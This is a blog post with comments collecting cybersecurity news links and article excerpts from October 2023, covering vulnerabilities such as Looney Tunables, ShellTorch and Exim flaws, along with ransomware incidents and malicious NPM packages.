This posting is here to collect cyber security news in October 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in October 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
265 Comments
Tomi Engdahl says:
New Marvin attack revives 25-year-old decryption flaw in RSA
https://www.bleepingcomputer.com/news/security/new-marvin-attack-revives-25-year-old-decryption-flaw-in-rsa/
A flaw related to the PKCS #1 v1.5 padding in SSL servers discovered in 1998 and believed to have been resolved still impacts several widely-used projects today.
After extensive testing that measures end-to-end operations, Red Hat researchers discovered several variations of the original timing attack, collectively called the ‘Marvin Attack,’ which can effectively bypass fixes and mitigations.
The problem allows attackers to potentially decrypt RSA ciphertexts, forge signatures, and even decrypt sessions recorded on a vulnerable TLS server.
Using standard hardware, the researchers demonstrated that executing the Marvin Attack within just a couple of hours is possible, proving its practicality.
Red Hat warns that the vulnerability isn’t limited to RSA but extends to most asymmetric cryptographic algorithms, making them susceptible to side-channel attacks.
“While the main venue of attack are TLS servers, the core issues that caused its widespread are applicable to most asymmetric cryptographic algorithms (Diffie-Hellman, ECDSA, etc.), not just to RSA.” – Red Hat.
Based on the conducted tests, the following implementations are vulnerable to the Marvin Attack:
OpenSSL (TLS level): Timing Oracle in RSA Decryption – CVE-2022-4304
OpenSSL (API level): Make RSA decryption API safe to use with PKCS#1 v1.5 padding – No CVE
GnuTLS (TLS level): Response times to malformed RSA ciphertexts in ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding. – CVE-2023-0361
NSS (TLS level): Improve constant-timeness in RSA operations. – CVE-2023-4421
pyca/cryptography: Attempt to mitigate Bleichenbacher attacks on RSA decryption; found to be ineffective; requires an OpenSSL level fix instead. – CVE-2020-25659
M2Crypto: Mitigate the Bleichenbacher timing attacks in the RSA decryption API; found to be ineffective; requires an OpenSSL level fix instead. – CVE-2020-25657
OpenSSL-ibmca: Constant-time fixes for RSA PKCS#1 v1.5 and OAEP padding in version 2.4.0 – No CVE
Go: crypto/rsa DecryptPKCS1v15SessionKey has limited leakage – No CVE
GNU MP: mpz_powm_sec leaks zero high order bits in result – No CVE
The researchers advise against using RSA PKCS#1 v1.5 encryption and urge impacted users to seek or request vendors to provide alternative backward compatibility avenues.
Simply disabling RSA does not mean you’re safe, warns the Q&A section of Marvin Attack’s page.
The risk is the same if the RSA key or certificate is used elsewhere on a server that supports it (SMTP, IMAP, POP mail servers, and secondary HTTPS servers).
Tomi Engdahl says:
GOVERNMENTGovernment Shutdown Could Bench 80% of CISA Staff
Roughly 80% of CISA staff will be sent home at the end of the week in case of a government shutdown.
https://www.securityweek.com/80-of-cisa-staff-at-risk-of-furlough-as-government-shutdown-looms/
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/millions-of-exim-mail-servers-exposed-to-zero-day-rce-attacks/
Karianne says:
Cybersecurity is paramount in today’s digital landscape. Protecting sensitive data and systems is crucial. To stay ahead of evolving threats, it’s essential to stay informed and utilize robust security measures. Check out https://trafkings.com/ for insights on monetizing traffic through affiliate programs while ensuring data security remains a top priority.
Tomi Engdahl says:
Data Protection
Researchers Extract Sounds From Still Images on Smartphone Cameras
https://www.securityweek.com/researchers-extract-sounds-from-still-images-on-smartphone-cameras/
A group of academic researchers devised a technique to extract sounds from still images captured using smartphone cameras with rolling shutter and movable lens structures.
Tomi Engdahl says:
Training & Awareness
CISA Kicks Off Cybersecurity Awareness Month With New Program
https://www.securityweek.com/cisa-kicks-off-cybersecurity-awareness-month-with-new-program/
CISA has announced the Secure Our World cybersecurity awareness program, targeting both businesses and end users.
To celebrate the 20th Cybersecurity Awareness Month, CISA has launched a new program, meant to promote four critical actions that businesses and individuals can take to improve cybersecurity.
Since 2004, October has been dedicated to raising awareness on the importance of cybersecurity for both private and public sectors, as part of a collaborative effort between government and industry.
This year, CISA is introducing Secure Our World, an initiative to deliver an “enduring message” to be integrated across CISA’s awareness campaigns and programs, encouraging both businesses and individuals to take action to protect their devices.
Tomi Engdahl says:
Unpatched Exim Vulnerabilities Expose Many Mail Servers to Attacks
https://www.securityweek.com/unpatched-exim-vulnerabilities-expose-many-mail-servers-to-attacks/
Patches are being developed for serious Exim vulnerabilities that could expose many mail servers to attacks.
The existence of several unpatched vulnerabilities impacting Exim mail transfer agent (MTA) installations was disclosed last week, more than one year after they were initially reported to developers.
Trend Micro’s Zero Day Initiative (ZDI) learned about six Exim vulnerabilities last year and reported the findings to the MTA software’s developers in June 2022. However, Exim developers have only now started working on patches, with accusations being made by both sides.
Exim, a piece of software used to receive and relay emails, is present on hundreds of thousands of servers. Vulnerabilities affecting the software can be highly valuable to threat actors, which have been known to exploit Exim flaws in their attacks.
Tomi Engdahl says:
Ransomware
Johnson Controls Hit by Ransomware
https://www.securityweek.com/johnson-controls-hit-by-ransomware/
Johnson Controls has confirmed being hit by a disruptive cyberattack, with a ransomware group claiming to have stolen 27Tb of information from the company.
Building technology giant Johnson Controls has confirmed being hit by a disruptive cyberattack that appears to have been carried out by a ransomware group.
An 8-K form filed by the company this week with the Securities and Exchange Commission (SEC) revealed that some of its internal IT infrastructure and applications were disrupted as a result of a cybersecurity incident.
An investigation has been launched to determine what type of information may have been compromised.
“To date, many of the Company’s applications are largely unaffected and remain operational. To the extent possible, and in line with its business continuity plans, the Company implemented workarounds for certain operations to mitigate disruptions and continue servicing its customers. However, the incident has caused, and is expected to continue to cause, disruption to parts of the Company’s business operations,” Johnson Controls said in the SEC filing.
The incident could force the company to delay the release of its fourth quarter and full fiscal year financial results.
Johnson Controls provides HVAC, automation, security, safety, smart home, retail, industrial refrigeration, and energy solutions and services. The company has more than 100,000 employees across 150 countries.
Threat intelligence group VX-Underground reported that a ransomware group known as Dark Angels is behind the attack on Johnson Controls. The hackers claim to have stolen 27Tb of data from the company’s systems.
Ransomware
Johnson Controls Ransomware Attack Could Impact DHS
https://www.securityweek.com/johnson-controls-ransomware-attack-could-impact-dhs/
DHS is reportedly investigating the impact of the recent Johnson Controls ransomware attack on its systems and facilities.
Sensitive Department of Homeland Security (DHS) information might have been compromised in a recent ransomware attack aimed at government contractor Johnson Controls International.
A multinational giant headquartered in Cork, Ireland, Johnson Controls produces industrial control systems and smart building equipment, software, and services, including HVAC, security, fire protection, and support solutions.
The company serves clients in the education, government, healthcare, hospitality, naval, and transportation sectors, including the DoD, DHS, and other government agencies in the US.
Tomi Engdahl says:
https://www.securityweek.com/chinese-gov-hackers-caught-hiding-in-cisco-router-firmware/
Tomi Engdahl says:
Data Breaches
European Telecommunications Standards Institute Discloses Data Breach
https://www.securityweek.com/european-telecommunications-standards-institute-discloses-data-breach/
Hackers stole a database containing the list of the European Telecommunications Standards Institute’s online users.
The European Telecommunications Standards Institute (ETSI) has disclosed a data breach following a cyberattack on its member’s portal.
Established in 1988, ETSI is an independent, not-for-profit organization that supports the development and testing of technical standards in the fields of information and communication, including technologies such as GSM, 3G, 4G, 5G, and others.
ETSI has over 900 member organizations from 65 countries across the globe, including academia, government, research entities, private organizations, and public bodies.
Last week, the France-based standardization body announced that hackers had breached “the IT system dedicated to its members’ work”, stealing the list of its online members.
“ETSI believes the database containing the list of their online users have been exfiltrated,” the organization said in an incident notice on its website.
ETSI says it has been working with the French National Cybersecurity Agency (ANSSI) to investigate the incident and that the vulnerability that led to the data breach has been fixed.
Tomi Engdahl says:
Incident Response
Live Exploitation Underscores Urgency to Patch Critical WS-FTP Server Flaw
https://www.securityweek.com/live-exploitation-underscores-urgency-to-patch-critical-ws-ftp-server-flaw/
Rapid7 says attackers are targeting a critical pre-authentication flaw in Progress Software’s WS_FTP server just days after disclosure.
Just days after the release of patches for a critical pre-authentication flaw in Progress Software’s WS_FTP server product, security experts have detected active exploitation in the wild against multiple target environments.
Cybersecurity vendor Rapid7 raised the alarm over the weekend after it spotted instances of live exploitation of the WS_FTP vulnerability in various customer environments.
According to Caitlin Condon, head of vulnerability research at Rapid7, the easy-to-exploit CVE-2023-40044 vulnerability is already in the crosshairs of attackers attempting mass exploitation of vulnerable WS_FTP servers.
“The process execution chain looks the same across all observed instances, indicating possible mass exploitation of vulnerable WS_FTP servers. Additionally, our MDR team has observed the same Burp Suite domain used across all incidents, which may point to a single threat actor behind the activity we’ve seen,” Condon said.
The critical-severity flaw, which carries a CVSS score of 10/10, can be triggered by attackers over the internet and affects all WS_FTP Server versions prior to 8.7.4 and 8.8.2
Tomi Engdahl says:
News Government Get more insights with the Recorded Future Intelligence Cloud.
Learn more. NATO ‘actively addressing’ alleged cyberattack affecting some websites https://therecord.media/nato-siegedsec-unclassified-websites-alleged-cyberattack
The North Atlantic Treaty Organization (NATO) said it is investigating claims that data was stolen from unclassified websites under the military alliance’s control. A hacking group named SiegedSec — which has been at the center of several recent hacks involving U.S. municipalities over the last year — claimed to have stolen 9 GB of data.
A spokesperson for NATO told Recorded Future News that it is now investigating the claims but said that the alliance has not faced any operational issues.
“NATO is facing persistent cyber threats and takes cyber security seriously.
NATO cyber experts are actively addressing incidents affecting some unclassified NATO websites,” the spokesperson said.
In posts on Telegram, SiegedSec boasted of accessing several training portals and informational platforms run by NATO.
—
Tomi Engdahl says:
Qualcomm says hackers exploit 3 zero-days in its GPU, DSP drivers https://www.bleepingcomputer.com/news/security/qualcomm-says-hackers-exploit-3-zero-days-in-its-gpu-dsp-drivers/
Qualcomm is warning of three zero-day vulnerabilities in its GPU and Compute DSP drivers that hackers are actively exploiting in attacks. The American semiconductor company was told by Google’s Threat Analysis Group (TAG) and Project Zero teams that CVE-2023-33106, CVE-2023-33107, CVE-2022-22071, and
CVE-2023-33063 may be under limited, targeted exploitation.
Qualcomm says it has released security updates that address the issues in its Adreno GPU and Compute DSP drivers, and impacted OEMs were also notified. The
CVE-2022-22071 flaw was disclosed in May 2022 and is a high-severity (CVSS
v3.1: 8.4) locally exploitable use after free bug impacting popular chips like the SD855, SD865 5G, and SD888 5G.
Tomi Engdahl says:
Warning: PyTorch Models Vulnerable to Remote Code Execution via ShellTorch https://thehackernews.com/2023/10/warning-pytorch-models-vulnerable-to.html
Cybersecurity researchers have disclosed multiple critical security flaws in the TorchServe tool for serving and scaling PyTorch models that could be chained to achieve remote code execution on affected systems. Israel-based runtime application security company Oligo, which made the discovery, has coined the vulnerabilities ShellTorch.
“These vulnerabilities [...] can lead to a full chain Remote Code Execution (RCE), leaving countless thousands of services and end-users — including some of the world’s largest companies — open to unauthorized access and insertion of malicious AI models, and potentially a full server takeover,” security researchers Idan Levcovich, Guy Kaplan, and Gal Elbaz said.
Tomi Engdahl says:
CVE-2023-4911: Looney Tunables – Local Privilege Escalation in the glibc’s ld.so https://blog.qualys.com/vulnerabilities-threat-research/2023/10/03/cve-2023-4911-looney-tunables-local-privilege-escalation-in-the-glibcs-ld-so#potential-impact-of-looney-tunables
The Qualys Threat Research Unit (TRU) has discovered a buffer overflow vulnerability in GNU C Library’s dynamic loader’s processing of the GLIBC_TUNABLES environment variable. We have successfully identified and exploited this vulnerability (a local privilege escalation that grants full root privileges) on the default installations of Fedora 37 and 38, Ubuntu
22.04 and 23.04, and Debian 12 and 13. It’s likely that other distributions are similarly susceptible, although we’ve noted that Alpine Linux remains an exception due to its use of musl libc instead of glibc. This vulnerability was introduced in April 2021.
Considering the identified vulnerability in the GNU C Library’s dynamic loader and its potential impact on systems, the Qualys Threat Research Unit advises security teams to prioritize patching this issue.
Tomi Engdahl says:
Android October security update fixes zero-days exploited in attacks https://www.bleepingcomputer.com/news/security/android-october-security-update-fixes-zero-days-exploited-in-attacks/
Google has released the October 2023 security updates for Android, addressing
54 unique vulnerabilities, including two known to be actively exploited. The two exploited flaws are CVE-2023-4863 and CVE-2023-4211, for which Google has “indications that they may be under limited, targeted exploitation.
CVE-2023-4863 is a buffer overflow vulnerability in the ubiquitous open-source library libwebp, which impacts numerous software products, including Chrome, Firefox, iOS, Microsoft Teams, and many more. The particular flaw was initially erroneously assigned separate CVEs for Apple iOS and Google Chrome, although it was actually in the underlying library. A subsequent attempt to fix it by assigning a new CVE (CVE-2023-5129) was rejected.
CVE-2023-4211 is an actively exploited flaw impacting multiple versions of Arm Mali GPU drivers used in a broad range of Android device models.
Tomi Engdahl says:
CISA adds latest Chrome zero-day to Known Exploited Vulnerabilities Catalog https://www.theregister.com/2023/10/03/cisa_adds_latest_chrome_zeroday/
The US’s Cybersecurity and Infrastructure Security Agency (CISA) has added the latest actively exploited zero-day vulnerability affecting Google Chrome to its Known Exploited Vulnerabilities (KEV) Catalog. The bug, tracked as CVE-2023-5217, received a patch from Google last week and was assigned a severity rating of 8.8 on the CVSS v3 scale.
With its addition to the KEV Catalog, CISA has effectively indicated that exploits for the vulnerability pose a “significant risk to the federal enterprise,” and agencies in the Federal Civilian Executive Branch (FCEB) have been set a three-week deadline of October 23 to apply the recommended fixes.
The vulnerability itself is a heap buffer overflow vulnerability affecting VP8 encoding in libvpx, an open source video codec library from the WebM Project.
Google hasn’t released many details regarding the vulnerability or the exploit chain, saying the restriction to information will remain until the majority of its users have updated to the safe version of Chrome.
Tomi Engdahl says:
Virginia school district open despite LockBit ransomware attack https://therecord.media/virginia-school-district-open-lockbit
A school district in Virginia has managed to keep classrooms open despite facing an attack from a notorious Russian ransomware gang. Fauquier County Public Schools runs 20 elementary, middle and high schools for more than
11,200 students. The county is about an hour from Washington, D.C.
A spokesperson for the district confirmed to Recorded Future News that it suffered a ransomware attack on September 12 and “immediately engaged cybersecurity experts and notified the appropriate law enforcement agencies.”
Tomi Engdahl says:
Exim patches three of six zero-day bugs disclosed last week https://www.bleepingcomputer.com/news/security/exim-patches-three-of-six-zero-day-bugs-disclosed-last-week/
Exim developers have released patches for three of the zero-days disclosed last week through Trend Micro’s Zero Day Initiative (ZDI), one of them allowing unauthenticated attackers to gain remote code execution. Discovered by an anonymous security researcher, the security flaw (CVE-2023-42115) is due to an Out-of-bounds Write weakness found in the SMTP service and can be exploited by remote unauthenticated attackers to execute code in the context of the service account.
“The specific flaw exists within the smtp service, which listens on TCP port
25 by default. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of a buffer,”
ZDI’s advisory explains. “Fix a possible OOB write in the external authenticator, which could be triggered by externally-supplied input,” the Exim development team says in the changelog of version 4.96.1, released today.
Tomi Engdahl says:
EvilProxy Phishing Attack Strikes Indeed https://menlosecurity.com/blog/evilproxy-phishing-attack-strikes-indeed/
Menlo Labs recently identified a phishing campaign targeting executives in senior level roles across various industries, but primarily Banking and Financial services, Insurance providers, Property Management and Real Estate, and Manufacturing. This is a classic example of AiTM (Adversary In The Middle) phishing attack by harvesting session cookies enabling threat actors to bypass MFA protections.
In July 2023, Menlo Security HEAT Shield detected and blocked a novel phishing attack that involved an open redirection in the ‘indeed.com’ website redirecting victims to a phishing page impersonating Microsoft. Consequently, this makes an unsuspecting victim believe the redirection resulted from a trusted source such as ‘indeed.com’. The threat actors were found to deploy the phishing pages using the phishing-as-a-service platform named ‘EvilProxy’.
The service is advertised and sold on the dark web as a subscription-based offering with the plan validity ranging between 10 days, 20 days, and 31 days.
Tomi Engdahl says:
Critical TorchServe Flaws Could Expose AI Infrastructure of Major Companies
https://www.securityweek.com/critical-torchserve-flaws-could-expose-ai-infrastructure-of-major-companies/
ShellTorch attack chains critical TorchServe vulnerabilities and could completely compromise the AI infrastructure of major companies.
A series of critical vulnerabilities impacting a tool called TorchServe could allow threat actors to take complete control of servers that are part of the artificial intelligence (AI) infrastructure of some of the world’s largest companies, according to a cybersecurity firm.
The flaws were discovered by Oligo, a company that specializes in runtime application security and observability, which disclosed its findings on Tuesday. The firm named the attack ShellTorch.
TorchServe is an open source package in PyTorch, a machine learning framework used for applications such as computer vision and natural language processing. PyTorch is currently part of the Linux Foundation and received significant contributions from Meta (its original developer) and AWS.
TorchServe is used by organizations around the world and has more than 30,000 PyPi downloads every month and over one million DockerHub pulls. It’s used by major companies such as Amazon, Google, Intel, Microsoft, Tesla and Walmart.
Oligo researchers discovered that TorchServe is affected by three vulnerabilities, including two that have been assigned a ‘critical severity’ rating based on their CVSS score.
One of the issues is actually a default misconfiguration that results in the TorchServe management interface being exposed to remote access without authentication.
The other two vulnerabilities can be exploited for remote code execution, through server-side request forgery (SSRF), tracked as CVE-2023-43654, and through unsafe deserialization, tracked as CVE-2022-1471. It’s worth noting that while Oligo has assigned both issues a ‘critical’ rating, PyTorch developers have assigned a ‘high severity’ rating to CVE-2023-43654.
ShellTorch: Multiple Critical Vulnerabilities in PyTorch Model Server (TorchServe) (CVSS 9.9, CVSS 9.8) Threatens Countless AI Users – Immediate Action Required
https://www.oligo.security/blog/shelltorch-torchserve-ssrf-vulnerability-cve-2023-43654
This week, the Oligo Security research team announced the discovery of critical vulnerabilities (including CVE-2023-43654) that led to a full chain Remote Code Execution (RCE) and found thousands of vulnerable instances publicly exposed, including of some of the world’s largest organizations —
Executive Summary
TorchServe, a popular open-source package in the PyTorch ecosystem, contained vulnerabilities enabling a total takeover of impacted systems.
Oligo Security discovered that the default configuration of TorchServe accidentally exposes the management interface to the entire world, without any form of authentication, allowing unauthorized access.
Oligo also uncovered a new critical (NVD, CVSS 9.8) SSRF vulnerability (CVE-2023-43654) in the management interface that allows remote code execution (RCE), supporting configuration uploads from any domain.
Oligo researchers also found that TorchServe was vulnerable in a way that allows it to be hacked remotely with Remote Code Execution while unsafely deserializing a malicious model (GHSA, CVSS 9.9).
The combination of these attacks can result in RCE and takeover, with tens of thousands of exposed instances of vulnerable TorchServe applications in the wild.
Oligo Security initiated a responsible disclosure process regarding these issues to the maintainers of PyTorch (Amazon & Meta). Some of these issues were fixed or addressed with a warning in version 0.8.2, any instances using version 0.8.1 or less should be updated immediately. Since the default configuration does not prevent some of these issues and may leave users vulnerable, it is important to take mitigation actions, as suggested below.
Need to check if your environment is impacted? Use our free tool to find out now.
PyTorch: A Perfect Bullseye for Attacks on AI Infrastructure
The PyTorch library is at the confluence of AI models and OSS libraries. One of the world’s most-used machine learning frameworks, PyTorch presents an attractive target to attackers who want to breach AI-based systems. In late 2022, attackers leveraged dependency confusion to compromise a PyTorch package, infecting it with malicious code.
TorchServe is among the most popular model-serving frameworks for PyTorch. Maintained by Meta and Amazon (and an official CNCF project with the Linux Foundation), the open-source TorchServe library is trusted by organizations worldwide, with over 30,000 PyPi downloads per month and more than a million total DockerHub pulls. It is dominant in the research world (over 90% of ML research papers now use PyTorch), and its commercial users include some of the world’s biggest companies, including Walmart, Amazon, OpenAI, Tesla, Azure, Google Cloud, Intel, and many more. TorchServe is also the base for projects such as KubeFlow, MLFlow, Kserve, AWS Neuron, and more. It is also offered as a managed service by the largest cloud providers, including SageMaker (AWS) and Vertex.AI (GCP).
Using a simple IP scanner we were able to find tens of thousands of IP addresses that are currently completely exposed to the attack – including many belonging to Fortune 500 organizations.
The vulnerabilities Oligo discovered impact all versions of TorchServe prior to 0.8.2. When used by a malicious actor, this chain of vulnerabilities results in remote code execution, allowing a complete takeover of the victim’s servers and networks and exfiltration of sensitive data.
Anatomy of a ShellTorch attack: The path to total takeover
By exploiting ShellTorch CVE-2023-43654, an attacker can execute code and take over the target server. This includes abusing an API misconfiguration that allows accessing the management console remotely without any authentication, exploiting a remote Server-Side Request Forgery (SSRF) vulnerability that allows uploading a malicious model that leads to code execution. Our research team has also found another unsafe deserialization vulnerability that can be triggered remotely, which exposes another attack vector to execute arbitrary code. By doing so, the attacker will obtain a way to infiltrate the network and use the resulting high privileges for lateral movement.
Using high privileges granted by these vulnerabilities, it is possible to view, modify, steal and delete AI models and sensitive data flowing into and from the target TorchServe server.
AWS has published an advisory informing customers that versions 0.3.0 through 0.8.1 are impacted and 0.8.2 patches the flaws. Oligo said Meta took steps to address the default misconfiguration that exposed servers.
“The issues in TorchServe – an optional tool for PyTorch – were patched in August rendering the exploit chain described in this blog post moot. We encourage developers to use the latest version of TorchServe,” a Meta spokesperson told SecurityWeek.
https://aws.amazon.com/security/security-bulletins/AWS-2023-009/
Tomi Engdahl says:
Synqly Joins Race to Fix Security, Infrastructure Product Integrations
https://www.securityweek.com/synqly-joins-race-to-fix-security-infrastructure-product-integrations/
Silicon Valley startup lands $4 million in seed funding from SYN Ventures, Okta Ventures and Secure Octane.
Tomi Engdahl says:
US Executives Targeted in Phishing Attacks Exploiting Flaw in Indeed Job Platform
https://www.securityweek.com/us-executives-targeted-in-phishing-attacks-exploiting-flaw-in-indeed-job-platform/
An open redirection vulnerability in the popular job search platform Indeed has been exploited in a series of phishing attac
Tomi Engdahl says:
Dozens of Malicious NPM Packages Steal User, System Data
https://www.securityweek.com/dozens-of-malicious-npm-packages-steal-user-system-data/
Fortinet warns of multiple malicious NPM packages that include install scripts designed to steal sensitive information.
Fortinet’s security researchers have identified multiple malicious NPM packages containing obfuscated scripts designed to harvest a trove of information from victims’ systems.
On Monday, Fortinet warned of 35 malicious packages in the NPM Registry containing install scripts capable of collecting system and user data and exfiltrating it via a webhook or file-sharing link.
The cybersecurity company has grouped the packages into nine different sets, based on similarities in styles of code and functions, including the targeting of specific sensitive information for exfiltration.
The install scripts within these packages would run pre- or post-install to perform data harvesting, but would also be executed when the NPM package was installed.
The first set of packages includes an obfuscated index.js script capable of stealing Kubernetes configurations, SSH keys, and other sensitive information. System data such as IP address, hostname, and username is targeted as well.
The second set of packages contains an index.js file designed to send an HTTP GET request to a specific URL, to scan for specific files and directories, and to exfiltrate developer data, such as source code and configuration files.
“The targeted files and directories may contain highly valuable intellectual property and sensitive information, such as various application and service credentials. It then archives these files and directories and uploads the resulting archives to an FTP server,” Fortinet explains.
Malicious Packages Hidden in NPM
https://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm
Affected platforms: All platforms where NPM packages can be installed
Impacted parties: Any individuals or institutions that have these malicious packages installed
Impact: Leak of credentials, sensitive information, source code, etc.
Severity level: High
Over the past few months, the FortiGuard Labs team has discovered several malicious packages hidden in NPM (Node Package Manager), the largest software registry for the JavaScript programming language. These packages were found through a system dedicated to discover malicious open-source packages from various ecosystems e.g. PyPI, NPM. In this blog, we will look at some of these packages, grouping them based on similar styles of code or functions.
In general, most of these malicious packages use install scripts that run pre or post-install. Whenever an NPM package is installed, those scripts are run as well. An example of this is shown below.
Tomi Engdahl says:
Motel One Discloses Ransomware Attack Impacting Customer Data
https://www.securityweek.com/motel-one-discloses-ransomware-attack-impacting-customer-data/
Motel One says customer addresses and credit card information were compromised in a recent ransomware attack.
Budget hotel chain Motel One Group on Monday confirmed that some customer information and credit card data was stolen in a recent ransomware attack.
The hackers gained access to the hotel operator’s internal systems and attempted to deploy file-encrypting ransomware, but were only partially successful, the company claims.
“Thanks to extensive measures, the impact was kept to a relative minimum. The business operation of one of Europe’s largest hotel groups was never at risk,” Motel One Group says in its incident notification.
The company says it immediately engaged a certified IT security service provider and alerted the relevant authorities to start investigating the incident.
According to the hotel chain’s initial assessment, the attackers accessed information related to customers’ addresses, along with “150 credit card details”.
“The affected card holders have already been informed personally,” Motel One Group says.
While the company did not name the hackers, the AlphV/Black Cat ransomware gang over the weekend claimed responsibility for the attack, adding Motel One to its leaks site.
https://www.motel-one.com/en/corporate/press/
Tomi Engdahl says:
Mobile & Wireless
Android’s October 2023 Security Updates Patch Two Exploited Vulnerabilities
https://www.securityweek.com/androids-october-2023-update-patches-two-exploited-vulnerabilities/
The October 2023 security update for Android patches two vulnerabilities exploited in attacks, both likely linked to spyware vendors.
Google on Monday announced the release of patches for 51 vulnerabilities as part of the October 2023 security updates for Android, including fixes for two zero-day flaws exploited in malicious attacks.
The first of the exploited issues is CVE-2023-4863 (CVSS score of 8.8), a heap buffer overflow in the Libwebp library that leads to an out-of-bounds memory write and remote code execution (RCE).
In the Android security bulletin for October 2023, Google explains that the vulnerability impacts the System component and assesses it with a ‘critical’ severity rating.
While the tech giant does not provide specific information on the observed in-the-wild exploitation, the issue was identified and reported by Apple and the Citizen Lab group at The University of Torontoʼs Munk School, which often details attacks linked to commercial spyware vendors. The flaw had been exploited to deliver spyware to iPhones.
Over the past weeks, vendors have been scrambling to assess the impact of CVE-2023-4863 and address the bug. To date, Palo Alto Networks, 1Password, Microsoft, and others have released advisories.
It’s worth noting that while CVE-2023-4863 has been reportedly exploited in the wild, there are no details on attacks beyond the ones aimed at iPhones.
Android Security Bulletin—October 2023
https://source.android.com/docs/security/bulletin/2023-10-01
Tomi Engdahl says:
Glibc Dynamic Loader Hit By A Nasty Local Privilege Escalation Vulnerability – Phoronix
https://www.phoronix.com/news/Glibc-LD-Nasty-Root-Bug
A nasty vulnerability has been made public today concerning Glibc’s dynamic loader that can lead to full root privileges being obtained by local users. This affects Linux distributions of the past two years with the likes of Ubuntu 22.04 LTS, 23.04, Fedora 38, and others vulnerable to this local privilege escalation issue.
Qualys announced this vulnerability a few minutes ago:
“The GNU C Library’s dynamic loader “find[s] and load[s] the shared objects (shared libraries) needed by a program, prepare[s] the program to run, and then run[s] it” (man ld.so). The dynamic loader is extremely security sensitive, because its code runs with elevated privileges when a local user executes a set-user-ID program, a set-group-ID program, or a program with capabilities. Historically, the processing of environment variables such as LD_PRELOAD, LD_AUDIT, and LD_LIBRARY_PATH has been a fertile source of vulnerabilities in the dynamic loader.
Recently, we discovered a vulnerability (a buffer overflow) in the dynamic loader’s processing of the GLIBC_TUNABLES environment variable. This vulnerability was introduced in April 2021 (glibc 2.34) by commit 2ed18c (“Fix SXID_ERASE behavior in setuid programs (BZ #27471)”).”
Glibc updates to the major Linux distributions should begin rolling out imminently. In the interim we are already seeing actions take place such as Debian temporarily restricting access to some of their systems until they are patched against this local privilege escalation vulnerability.
Tomi Engdahl says:
Suomalaisia verkkosivuja vastaan isketään – venäläisryhmä otti vastuun
https://www.is.fi/digitoday/tietoturva/art-2000009900061.html
Viranomaisten verkkopalvelut ovat jälleen palvelunestohyökkäyksen kohteena, Yle kertoo. Uhrit eivät kuitenkaan rajoitu niihin.
Eri suomalaiset verkkosivustot ovat tänään keskiviikkona joutuneet palvelunestohyökkäyksen kohteeksi, Yle kertoo. Tällainen hyökkäys tarkoittaa, että kohteeksi valituille sivuille voi olla hetkittäin vaikea tai mahdotonta päästä, ja sivustot voivat toimia muutenkin hitaasti.
Kohteina ovat olleet ainakin Traficom, Väylävirasto, Kyberturvallisuuskeskus, HSL (Helsingin seudun liikenne) ja Ely-keskus.
Lisäksi OP sanoo sivuillaan, että ”Op.fi-palvelussa on palvelunestohyökkäyksen aiheuttama häiriö. Asiakkaidemme tiedot ja rahat eivät ole vaarassa. OP-mobiili ja OP:n maksukortit toimivat normaalisti. Asiantuntijamme korjaavat tilannetta parhaillaan. Pahoittelemme aiheutunutta haittaa”.
Venäläismielinen hakkeriryhmä väittää tehneensä palvelunestohyökkäyksen suomalaissivuille
https://yle.fi/a/74-20053532
Ryhmä kertoo tehneensä hyökkäyksen muun muassa Traficomin, Väyläviraston ja Kyberturvallisuuskeskuksen verkkosivuille.
Useisiin suomalaisiin verkkosivuihin on kohdistunut palvelunestohyökkäys, jonka tekijäksi on Telegram-palvelussa ilmoittautunut venäläinen hakkeriryhmä NoName05716. Hakkeriryhmä viesti palvelunestohyökkäyksestä keskiviikkona alkuiltapäivästä.
Ryhmä kertoo tehneensä hyökkäyksen muun muassa Traficomin, Väyläviraston, Kyberturvallisuuskeskuksen, HSL:n ja Ely-keskuksen verkkosivuille. Verkkosivut vaikuttavat toimivan joko täysin tai osittain hitaasti, eikä niillä ole erikseen ilmoitettu kyberhyökkäyksistä.
Tomi Engdahl says:
Bill Toulas / BleepingComputer:
Oligo Security finds since-patched RCE flaws in open-source AI model-serving tool TorchServe and vulnerable instances at tens of thousands of IP addresses — A set of critical vulnerabilities dubbed ‘ShellTorch’ in the open-source T
ShellTorch flaws expose AI servers to code execution attacks
https://www.bleepingcomputer.com/news/security/shelltorch-flaws-expose-ai-servers-to-code-execution-attacks/
A set of critical vulnerabilities dubbed ‘ShellTorch’ in the open-source TorchServe AI model-serving tool impact tens of thousands of internet-exposed servers, some of which belong to large organizations.
TorchServe, maintained by Meta and Amazon, is a popular tool for serving and scaling PyTorch (machine learning framework) models in production.
Tomi Engdahl says:
New ‘Looney Tunables’ Linux bug gives root on major distros
https://www.bleepingcomputer.com/news/security/new-looney-tunables-linux-bug-gives-root-on-major-distros/
A new Linux vulnerability known as ‘Looney Tunables’ enables local attackers to gain root privileges by exploiting a buffer overflow weakness in the GNU C Library’s ld.so dynamic loader.
The GNU C Library (glibc) is the GNU system’s C library and is in most Linux kernel-based systems. It provides essential functionality, including system calls like open, malloc, printf, exit, and others, necessary for typical program execution.
The dynamic loader within glibc is of utmost importance, as it is responsible for program preparation and execution on Linux systems that use glibc.
Discovered by the Qualys Threat Research Unit, the flaw (CVE-2023-4911) was introduced in April 2021, with the release of glibc 2.34, via a commit described as fixing SXID_ERASE behavior in setuid programs.
“Our successful exploitation, leading to full root privileges on major distributions like Fedora, Ubuntu, and Debian, highlights this vulnerability’s severity and widespread nature,” said Saeed Abbasi, Product Manager at Qualys’ Threat Research Unit.
Tomi Engdahl says:
Atlassian patches critical Confluence zero-day exploited in attacks https://www.bleepingcomputer.com/news/security/atlassian-patches-critical-confluence-zero-day-exploited-in-attacks/
Australian software company Atlassian released emergency security updates to fix a maximum severity zero-day vulnerability in its Confluence Data Center and Server software, which has been exploited in attacks. “Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances,” the company said.
“Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.” Tracked as CVE-2023-22515, this critical privilege escalation flaw affects Confluence Data Center and Server 8.0.0 and later and is described as being remotely exploitable in low-complexity attacks that don’t require user interaction.
